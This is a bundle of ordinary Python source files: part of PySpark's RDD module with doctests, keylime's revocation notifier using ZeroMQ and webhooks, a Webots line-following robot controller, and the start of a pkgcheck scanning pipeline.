"spark.python.worker.memory", "512m"))
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.iteritems()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.iteritems()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
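# A usage sketch (not one of the shipped doctests), assuming a live
# SparkContext `sc`: build per-key (sum, count) pairs, e.g. to derive means.
#
#   >>> rdd = sc.parallelize([("a", 1), ("a", 3), ("b", 5)])
#   >>> seq = lambda acc, v: (acc[0] + v, acc[1] + 1)
#   >>> comb = lambda a, b: (a[0] + b[0], a[1] + b[1])
#   >>> sorted(rdd.aggregateByKey((0, 0), seq, comb).collect())
#   [('a', (4, 2)), ('b', (5, 1))]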
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1]), list(y[2]), list(y[3])))), \
sorted(list(w.groupWith(x, y, z).collect())))
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func((key, vals)):
return vals[0] and not vals[1]
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
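# Matching batch sizes matter because the JVM-side zip pairs serialized
# batches element by element; mismatched batching would misalign records
# even when both RDDs contain the same number of elements.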
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if name_:
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1').name()
'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda (k, v): k == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)], False)
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 950 < n < 1050
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 18 < n < 22
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
if relativeSD > 0.37:
raise ValueError("relativeSD should be smaller than 0.37")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
partitions = xrange(self.getNumPartitions())
for partition in partitions:
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# tracking the life cycle by obj
if obj is not None:
obj._broadcast = broadcast
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
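# Composing the new func with prev_func keeps the whole chain of narrow
# transformations inside a single Python task, so each partition pays only
# one JVM <-> Python round trip instead of one per transformation.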
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self._broadcast = None
def __del__(self):
if self._broadcast:
self._broadcast.unpersist()
self._broadcast = None
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
revocation_notifier.py
|
"""
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
"""
import functools
import os
import signal
import sys
import threading
import time
from multiprocessing import Process
from typing import Optional
import requests
from keylime import config, crypto, json, keylime_logging, secure_mount
from keylime.common import retry
logger = keylime_logging.init_logging("revocation_notifier")
broker_proc: Optional[Process] = None
_SOCKET_PATH = "/var/run/keylime/keylime.verifier.ipc"
def start_broker():
assert config.getboolean("cloud_verifier", "revocation_notifier")
try:
import zmq # pylint: disable=import-outside-toplevel
except ImportError as error:
raise Exception("install PyZMQ for 'revocation_notifier' option") from error
def worker():
# do not receive signals from the parent process
os.setpgrp()
signal.signal(signal.SIGTERM, lambda *_: sys.exit(0))
dir_name = os.path.dirname(_SOCKET_PATH)
if not os.path.exists(dir_name):
os.makedirs(dir_name, 0o700)
else:
if os.stat(dir_name).st_mode & 0o777 != 0o700:
msg = f"{dir_name} present with wrong permissions"
logger.error(msg)
raise Exception(msg)
context = zmq.Context(1)
frontend = context.socket(zmq.SUB)
frontend.bind(f"ipc://{_SOCKET_PATH}")
frontend.setsockopt(zmq.SUBSCRIBE, b"")
# Socket facing services
backend = context.socket(zmq.PUB)
backend.bind(
f"tcp://{config.get('cloud_verifier', 'revocation_notifier_ip')}:"
f"{config.getint('cloud_verifier', 'revocation_notifier_port')}"
)
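# zmq.device(FORWARDER, ...) below bridges the two sockets: every message
# published on the local IPC frontend is re-broadcast on the TCP backend to
# all connected subscribers.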
try:
zmq.device(zmq.FORWARDER, frontend, backend)
except (KeyboardInterrupt, SystemExit):
context.destroy()
global broker_proc
broker_proc = Process(target=worker, name="zeroMQ")
broker_proc.start()
def stop_broker():
if broker_proc is not None:
# Remove the socket file before we kill the process
# (the "ipc://" scheme is only part of the ZMQ endpoint, not a filesystem path)
if os.path.exists(_SOCKET_PATH):
os.remove(_SOCKET_PATH)
logger.info("Stopping revocation notifier...")
broker_proc.terminate()
broker_proc.join(5)
if broker_proc.is_alive():
logger.debug("Killing revocation notifier because it did not terminate after 5 seconds...")
broker_proc.kill()
def notify(tosend):
assert config.getboolean("cloud_verifier", "revocation_notifier")
try:
import zmq # pylint: disable=import-outside-toplevel
except ImportError as error:
raise Exception("install PyZMQ for 'revocation_notifier' option") from error
# python-requests internally uses either simplejson (preferred) or
# the built-in json module, and when it is using the built-in one,
# it may encounter difficulties handling bytes instead of strings.
# To avoid such issues, let's convert `tosend' to str beforehand.
tosend = json.bytes_to_str(tosend)
def worker(tosend):
context = zmq.Context()
mysock = context.socket(zmq.PUB)
mysock.connect(f"ipc://{_SOCKET_PATH}")
# wait 200ms for the connect to happen
time.sleep(0.2)
# now send it out via 0mq
logger.info("Sending revocation event to listening nodes...")
for i in range(config.getint("cloud_verifier", "max_retries")):
try:
mysock.send_string(json.dumps(tosend))
break
except Exception as e:
interval = config.getfloat("cloud_verifier", "retry_interval")
exponential_backoff = config.getboolean("cloud_verifier", "exponential_backoff")
next_retry = retry.retry_time(exponential_backoff, interval, i, logger)
logger.debug(
"Unable to publish revocation message %d times, trying again in %f seconds: %s", i, next_retry, e
)
time.sleep(next_retry)
mysock.close()
cb = functools.partial(worker, tosend)
t = threading.Thread(target=cb)
t.start()
def notify_webhook(tosend):
url = config.get("cloud_verifier", "webhook_url", fallback="")
# Check if a url was specified
if url == "":
return
# Similarly to notify(), let's convert `tosend' to str to prevent
# possible issues with json handling by python-requests.
tosend = json.bytes_to_str(tosend)
def worker_webhook(tosend, url):
interval = config.getfloat("cloud_verifier", "retry_interval")
exponential_backoff = config.getboolean("cloud_verifier", "exponential_backoff")
session = requests.session()
logger.info("Sending revocation event via webhook...")
for i in range(config.getint("cloud_verifier", "max_retries")):
next_retry = retry.retry_time(exponential_backoff, interval, i, logger)
try:
response = session.post(url, json=tosend, timeout=5)
if response.status_code in [200, 202]:
break
logger.debug(
"Unable to publish revocation message %d times via webhook, "
"trying again in %d seconds. "
"Server returned status code: %s",
i,
next_retry,
response.status_code,
)
except requests.exceptions.RequestException as e:
logger.debug(
"Unable to publish revocation message %d times via webhook, " "trying again in %d seconds: %s",
i,
next_retry,
e,
)
time.sleep(next_retry)
w = functools.partial(worker_webhook, tosend, url)
t = threading.Thread(target=w, daemon=True)
t.start()
cert_key = None
def await_notifications(callback, revocation_cert_path):
# keep old typo "listen_notfications" around for a few versions
assert config.getboolean("cloud_agent", "listen_notifications", fallback=False) or config.getboolean(
"cloud_agent", "listen_notfications", fallback=False
)
try:
import zmq # pylint: disable=import-outside-toplevel
except ImportError as error:
raise Exception("install PyZMQ for 'listen_notifications' option") from error
global cert_key
if revocation_cert_path is None:
raise Exception("must specify revocation_cert_path")
context = zmq.Context()
mysock = context.socket(zmq.SUB)
mysock.setsockopt(zmq.SUBSCRIBE, b"")
mysock.connect(
f"tcp://{config.get('general', 'receive_revocation_ip')}:"
f"{config.getint('general', 'receive_revocation_port')}"
)
logger.info(
"Waiting for revocation messages on 0mq %s:%s",
config.get("general", "receive_revocation_ip"),
config.getint("general", "receive_revocation_port"),
)
while True:
rawbody = mysock.recv()
body = json.loads(rawbody)
if cert_key is None:
# load up the CV signing public key
if revocation_cert_path is not None and os.path.exists(revocation_cert_path):
logger.info("Lazy loading the revocation certificate from %s", revocation_cert_path)
with open(revocation_cert_path, "rb") as f:
certpem = f.read()
cert_key = crypto.x509_import_pubkey(certpem)
if cert_key is None:
logger.warning("Unable to check signature of revocation message: %s not available", revocation_cert_path)
elif "signature" not in body or body["signature"] == "none":
logger.warning("No signature on revocation message from server")
elif not crypto.rsa_verify(cert_key, body["msg"].encode("utf-8"), body["signature"].encode("utf-8")):
logger.error("Invalid revocation message siganture %s", body)
else:
message = json.loads(body["msg"])
logger.debug("Revocation signature validated for revocation: %s", message)
callback(message)
def main():
start_broker()
def worker():
def print_notification(revocation):
logger.warning("Received revocation: %s", revocation)
keypath = os.path.join(secure_mount.mount(), "unzipped", "RevocationNotifier-cert.crt")
await_notifications(print_notification, revocation_cert_path=keypath)
t = threading.Thread(target=worker)
t.start()
# time.sleep(0.5)
json_body2 = {
"v": "vbaby",
"agent_id": "2094aqrea3",
"cloudagent_ip": "ipaddy",
"cloudagent_port": "39843",
"tpm_policy": '{"ab":"1"}',
"metadata": '{"cert_serial":"1"}',
"allowlist": "{}",
"ima_sign_verification_keys": "{}",
"revocation_key": "",
"revocation": '{"cert_serial":"1"}',
}
print("sending notification")
notify(json_body2)
time.sleep(2)
print("shutting down")
stop_broker()
print("exiting...")
sys.exit(0)
print("done")
if __name__ == "__main__":
main()
|
4wheels.py
|
# code by
# Eduardo Migueis
# Illy Bordini
# Guilherme Lima
from controller import Robot, Motor, DistanceSensor, Camera
import requests
from PIL import Image
import threading
import time
# create the robot instance
robot = Robot()
time_step = 64
max_speed = 6.28
# motors
# front wheels
right_motor_front = robot.getDevice('wheel_rf')
right_motor_front.setPosition(float('inf'))
right_motor_front.setVelocity(0.0)
left_motor_front = robot.getDevice('wheel_lf')
left_motor_front.setPosition(float('inf'))
left_motor_front.setVelocity(0.0)
# rear wheels
right_motor_back = robot.getDevice('wheel_rb')
right_motor_back.setPosition(float('inf'))
right_motor_back.setVelocity(0.0)
left_motor_back = robot.getDevice('wheel_lb')
left_motor_back.setPosition(float('inf'))
left_motor_back.setVelocity(0.0)
# IR sensors
right_ir = robot.getDevice('RIGHT')
right_ir.enable(time_step)
mid_ir = robot.getDevice('MID')
mid_ir.enable(time_step)
left_ir = robot.getDevice('LEFT')
left_ir.enable(time_step)
camera = robot.getDevice("camera")
camera.enable(time_step)
# thread that pings the server to open a Chrome instance
# every ten seconds with a freshly captured photo
def sendImg():
while True:
time.sleep(10)
img = camera.getImage()
camera.saveImage("photo.png", 100)
requests.post('http://localhost:5000/api/img')
counter = 0
# Main loop:
# - run the simulation steps until Webots stops the controller
while robot.step(time_step) != -1:
if counter == 0:
print("malygno")
x = threading.Thread(target=sendImg, daemon=True)
x.start()
counter = 1
# read the sensors:
right_ir_val = right_ir.getValue()
mid_ir_val = mid_ir.getValue()
left_ir_val = left_ir.getValue()
left_speed_f = max_speed # _f for front
right_speed_f = max_speed # _f for front
left_speed_b = max_speed # _b for back
right_speed_b = max_speed # _b for back
# Process the sensor data.
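# The branches below apparently treat readings >= 300 as "sensor over the
# line": go straight while only the middle sensor sees it, and stop the
# wheels on whichever side sees the line so the robot turns back toward it.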
if left_ir_val < 300 and right_ir_val < 300 and mid_ir_val >= 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(right_speed_b)
if left_ir_val < 300 and right_ir_val >= 300 and mid_ir_val >= 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(0)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(0)
if left_ir_val >= 300 and right_ir_val < 300 and mid_ir_val >= 300:
left_motor_front.setVelocity(0)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(0)
right_motor_back.setVelocity(right_speed_b)
if left_ir_val >= 300 and right_ir_val < 300 and mid_ir_val < 300:
left_motor_front.setVelocity(0)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(0)
right_motor_back.setVelocity(right_speed_b)
if left_ir_val < 300 and right_ir_val >= 300 and mid_ir_val < 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(0)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(0)
if left_ir_val < 300 and right_ir_val < 300 and mid_ir_val < 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(right_speed_b)
pass
|
pipeline.py
|
"""Pipeline building support for connecting sources and checks."""
import os
import traceback
from collections import defaultdict, deque
from concurrent.futures import ThreadPoolExecutor
from itertools import chain
from multiprocessing import Pool, Process, SimpleQueue
from pkgcore.package.errors import MetadataException
from pkgcore.restrictions import boolean, packages
from . import base
from .results import MetadataError
from .sources import UnversionedSource, VersionedSource
class Pipeline:
"""Check-running pipeline leveraging scope-based parallelism."""
def __init__(self, options, scan_scope, pipes, restrict):
self.options = options
self.scan_scope = scan_scope
self.pipes = pipes
self.restrict = restrict
self.jobs = options.jobs
self.pkg_scan = (
scan_scope in (base.version_scope, base.package_scope) and
isinstance(restrict, boolean.AndRestriction))
def _queue_work(self, scoped_pipes, work_q, results_q):
"""Producer that queues scanning tasks against granular scope restrictions."""
try:
for scope in sorted(scoped_pipes['sync'], reverse=True):
pipes = scoped_pipes['sync'][scope]
if scope is base.version_scope:
versioned_source = VersionedSource(self.options)
for restrict in versioned_source.itermatch(self.restrict):
for i in range(len(pipes)):
work_q.put((scope, restrict, i))
elif scope is base.package_scope:
unversioned_source = UnversionedSource(self.options)
for restrict in unversioned_source.itermatch(self.restrict):
work_q.put((scope, restrict, 0))
else:
for i in range(len(pipes)):
